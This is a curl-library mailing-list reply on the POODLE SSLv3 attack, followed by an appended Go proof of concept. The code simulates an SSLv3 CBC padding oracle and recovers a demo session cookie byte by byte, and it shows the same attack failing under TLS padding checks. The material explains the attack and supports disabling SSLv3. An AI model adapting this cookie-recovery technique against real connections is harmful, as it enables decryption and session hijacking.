curl-library

Re: SSLv3 fallback attack POODLE

From: Daniel Stenberg <daniel_at_haxx.se>
Date: Thu, 16 Oct 2014 08:55:00 +0200 (CEST)

On Wed, 15 Oct 2014, Ray Satiro wrote:

> I read today of a new method to decrypt SSL called POODLE. If you haven't
> read of it you should. It works by using SSL fallback behavior to get SSLv3
> which can now be decrypted [1][2].

I won't belittle the attack, but I want us to take a step back and look at
what this attack is and does and then what we should do as good netizens to
make sure it is clean outside our door.

As I understand things (and please correct me on any errors I make), POODLE is
at least two things: A) a "downgrade dance" that makes the client switch down
to SSLv3 instead of using the more reliable TLS versions, combined with B) an
attack using a block cipher over this SSLv3 to expose/figure out (parts of)
the plain text.

A decent and simple remedy to all of this is to just reject and deny SSLv3
completely. That'll hurt some amount of legacy services and users. My guess is
that we probably already hurt those same users with our default cipher list
not including RC4. (I noticed libressl went ahead and disabled SSLv3 by
default.)

But the (B) part above requires an active attacker that can try a lot of
variations of the same request to see how they end up different, and in all
the cases I've seen so far it basically requires javascript in a browser.

Is there a case for (B) using curl or libcurl?

-- 
  / daniel.haxx.se
Received on 2014-10-16
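The (B) part of the mail describes an attacker that re-sends the same request many times and watches how the server reacts. The following is an added illustration, not code from curl, libcurl or anyone on this thread, written in Go with the standard-library AES and HMAC. It models only the SSLv3 record layer: CBC with plaintext||MAC||padding, where an SSLv3 receiver checks just the padding-length byte while a TLS 1.0+ receiver checks every padding byte. The attacker copies the ciphertext block holding a secret byte over the final, all-padding block; SSLv3 accepts that forgery exactly when the decrypted last byte equals bs-1, which leaks one plaintext byte per roughly 256 tries. The keys, the cookie value and the request layout are constructed for the demo; the `victim` closure that re-encrypts the request with a fresh IV stands in for the JavaScript-driven browser requests the mail refers to, and the (A) downgrade step is not modelled. It goes a bit beyond the mail's description by sliding the request so that every cookie byte is recovered in turn, not just one.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

const bs = aes.BlockSize

// Constructed demo values (hypothetical keys and cookie, not real data).
var (
	encKey       = []byte("0123456789abcdef")
	macKey       = []byte("fedcba9876543210")
	secretCookie = []byte("session=4f9c2a7d0b")
)

func mac(msg []byte) []byte {
	h := hmac.New(sha256.New, macKey)
	h.Write(msg)
	return h.Sum(nil)
}

// request is what the victim sends: an attacker-chosen path length, the cookie
// the browser adds on its own, and an attacker-chosen body length. The two
// lengths let the attacker put the byte of interest at the end of a CBC block
// while keeping plaintext||MAC a whole number of blocks (final block = padding).
func request(prefixLen, suffixLen int) []byte {
	r := append([]byte("GET /"), bytes.Repeat([]byte("a"), prefixLen)...)
	r = append(r, " HTTP/1.1\r\nCookie: "...)
	r = append(r, secretCookie...)
	r = append(r, "\r\n\r\n"...)
	return append(r, bytes.Repeat([]byte("b"), suffixLen)...)
}

// sealRecord returns iv||CBC(plaintext||MAC||padding) with a fresh random IV.
// Padding is padLen bytes plus one byte holding padLen; filling the padding
// bytes with padLen makes the record valid for SSLv3 and TLS receivers alike.
func sealRecord(plaintext []byte) []byte {
	body := append(append([]byte{}, plaintext...), mac(plaintext)...)
	padLen := (bs - (len(body)+1)%bs) % bs
	body = append(body, bytes.Repeat([]byte{byte(padLen)}, padLen+1)...)
	iv := make([]byte, bs)
	if _, err := rand.Read(iv); err != nil {
		panic(err)
	}
	blk, _ := aes.NewCipher(encKey)
	ct := make([]byte, len(body))
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(ct, body)
	return append(iv, ct...)
}

// openRecord validates a record like an SSLv3 receiver (strict=false: only the
// length byte is checked, padding bytes are ignored) or a TLS 1.0+ receiver
// (strict=true: every padding byte must equal padLen). It returns only
// accept/reject, which is all the attacker gets to see.
func openRecord(rec []byte, strict bool) bool {
	if len(rec) < 2*bs || len(rec)%bs != 0 {
		return false
	}
	blk, _ := aes.NewCipher(encKey)
	pt := make([]byte, len(rec)-bs)
	cipher.NewCBCDecrypter(blk, rec[:bs]).CryptBlocks(pt, rec[bs:])
	padLen := int(pt[len(pt)-1])
	if padLen >= bs || padLen+1+sha256.Size > len(pt) {
		return false
	}
	if strict {
		for _, b := range pt[len(pt)-1-padLen : len(pt)-1] {
			if int(b) != padLen {
				return false
			}
		}
	}
	body := pt[:len(pt)-1-padLen]
	msg, tag := body[:len(body)-sha256.Size], body[len(body)-sha256.Size:]
	return hmac.Equal(tag, mac(msg))
}

// poodleByte recovers the plaintext byte at offset pos (last byte of a block).
// Each try gets a fresh encryption from the victim, copies ciphertext block C_i
// over the final (all-padding) block and checks whether the server accepts.
// Under SSLv3 rules it does exactly when D(C_i) xor C_{n-1} ends in bs-1, so
// P_i[last] = (bs-1) xor C_{i-1}[last] xor C_{n-1}[last].
func poodleByte(victim func() []byte, pos int, strict bool, maxTries int) (byte, int, error) {
	if pos%bs != bs-1 {
		return 0, 0, errors.New("pos must be the last byte of a block")
	}
	for try := 1; try <= maxTries; try++ {
		rec := victim()
		n := len(rec)/bs - 1 // ciphertext blocks; rec block 0 is the IV
		i := pos/bs + 1      // rec block that encrypts the target plaintext block
		forged := append([]byte{}, rec...)
		copy(forged[n*bs:], rec[i*bs:(i+1)*bs])
		if openRecord(forged, strict) {
			return byte(bs-1) ^ rec[i*bs-1] ^ rec[n*bs-1], try, nil
		}
	}
	return 0, maxTries, errors.New("server never accepted a forged record")
}

// recoverCookie re-aligns the request for every cookie byte and runs
// poodleByte on it. With strict=true the forgery is never accepted.
func recoverCookie(strict bool, maxTries int) ([]byte, error) {
	base := request(0, 0)
	cookieAt := bytes.Index(base, []byte("Cookie: ")) + len("Cookie: ") // layout is public
	out := make([]byte, 0, len(secretCookie))
	for k := 0; k < len(secretCookie); k++ {
		prefixLen := ((bs-1-cookieAt-k)%bs + bs) % bs
		suffixLen := (bs - (len(base)+prefixLen)%bs) % bs
		pos := cookieAt + prefixLen + k
		victim := func() []byte { return sealRecord(request(prefixLen, suffixLen)) }
		b, _, err := poodleByte(victim, pos, strict, maxTries)
		if err != nil {
			return out, err
		}
		out = append(out, b)
	}
	return out, nil
}

func main() {
	got, err := recoverCookie(false, 20000)
	fmt.Printf("SSLv3 padding check: recovered %q (err=%v)\n", got, err)
	_, err = recoverCookie(true, 2000)
	fmt.Printf("TLS padding check:   %v\n", err)
}
```

Running it recovers the whole constructed cookie under the SSLv3 check after a few thousand re-encryptions, and fails under the TLS check, which is why refusing SSLv3 (or at least refusing CBC suites under it) closes the hole regardless of the downgrade dance. The same rejection-only oracle is what a non-browser client would have to be made to feed an attacker, which is the question the mail ends on.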